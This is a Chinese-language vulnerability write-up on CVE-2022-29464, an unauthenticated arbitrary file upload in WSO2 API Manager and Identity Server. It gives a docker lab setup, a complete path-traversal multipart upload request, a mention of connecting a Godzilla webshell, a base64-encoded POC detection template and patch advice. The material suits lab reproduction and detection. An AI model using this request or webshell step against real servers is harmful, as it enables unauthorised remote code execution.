WSO2文件上传漏洞(CVE-2022-29464)–那-漏洞文库小世界-安全文库-NGC660 安全实验室

WSO2文件上传漏洞(CVE-2022-29464)–那

0x01漏洞描述

WSO2文件上传漏洞是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传。

0x02影响范围

WSO2 API Manager 2.2.0 及更高版本到 4.0.0
WSO2 Identity Server 5.2.0 及以上至 5.11.0
WSO2 Identity Server Analytics(身份服务器分析) 5.4.0、5.4.1、5.5.0 和 5.6.0
WSO2 Identity Server as Key Manager(身份服务器作为密钥管理器) 5.3.0 及更高版本至 5.10.0
WSO2 Enterprise Integrator 6.2.0 及更高版本至 6.6.0

0x03环境搭建

使用docker进行环境搭建
docker pull vulfocus/wso2-cve_2022_29464

m_fb4fb77cb126cae6702c9b8381b95879_r

docker run -d -it -p 8280:8280 -p 8243:8243 -p 9443:9443 --name cve_2022_29464 vulfocus/wso2-cve_2022_29464

m_a655615cb32c4531d1f161ef56dbf7fc_r

直接打开https://ip:9443 如下显示则环境搭建成功。

m_f0e2b007bc6bfef23cd70fce18ae110e_r

0x04漏洞复现

1、抓包

打开页面抓取随意数据包

m_514ec930d7f88b8919a1d3eb8b0e3832_r

然后修改上传包

POST /fileupload/toolsAny HTTP/1.1
Host: xxxx:xxxx
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 889
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.txt"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.txt"


123123
--4ef9f369a86bfaadf5ec3177278d49c0--

2、测试

发送数据包且返回包响应为200,内容中含有1.6······等一串数字,
则证明上传成功。

m_90ffb296d0b802960ae2039435ea5629_r

然后访问
https://ip:9443/authenticationendpoint/”wenjianming”
成功上传

m_60334fd43d394ba6c8306170b2438b8b_r

3、shell

使用哥斯拉马进行测试下

m_a9949e144d351707f963b9c1907f9a9b_r

成功连接

m_72aabce1627a3c86f301592c19156e5b_r

0x05 POC检测

poc:


params: []
name: WSO2文件上传漏洞
set:
  ri: randomInt(800000000, 1000000000)
  r1: base64Decode('LS00YWY2ZjM2MmE4NmJhYWRmNWVjMzE3NzI3OGQ0OTExDQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9Ii4uLy4uLy4uLy4uL3JlcG9zaXRvcnkvZGVwbG95bWVudC9zZXJ2ZXIvd2ViYXBwcy9hdXRoZW50aWNhdGlvbmVuZHBvaW50LzgwODI0MDQ1Ni50eHQiOyBmaWxlbmFtZT0iLi4vLi4vLi4vLi4vcmVwb3NpdG9yeS9kZXBsb3ltZW50L3NlcnZlci93ZWJhcHBzL2F1dGhlbnRpY2F0aW9uZW5kcG9pbnQvODA4MjQwNDU2LnR4dCINCg0KMTMyMzMxMjMNCg0KLS00YWY2ZjM2MmE4NmJhYWRmNWVjMzE3NzI3OGQ0OTExLS0=')
rules:
- method: POST
  path: /fileupload/toolsAny
  headers:
    Content-Type: multipart/form-data; boundary=4af6f362a86baadf5ec3177278d4911
  body: |
    {{r1}}
  search: ""
  followredirects: false
  expression: response.status ==   200 && response.headers["Set-Cookie"].contains("JSESSIONID=")
- method: GET
  path: /authenticationendpoint/808240456.txt
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status ==   200 && response.body.bcontains(bytes("13233123"))
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

m_eb5d7b2e35568c123db9de71dc84d770_r

0x06 修复方案

厂商已分别发布补丁修复漏洞,用户请尽快更新至安全版本。

官方下载地址:
https://github.com/wso2/product-apim/releases

请登录后发表评论

    请登录后查看回复内容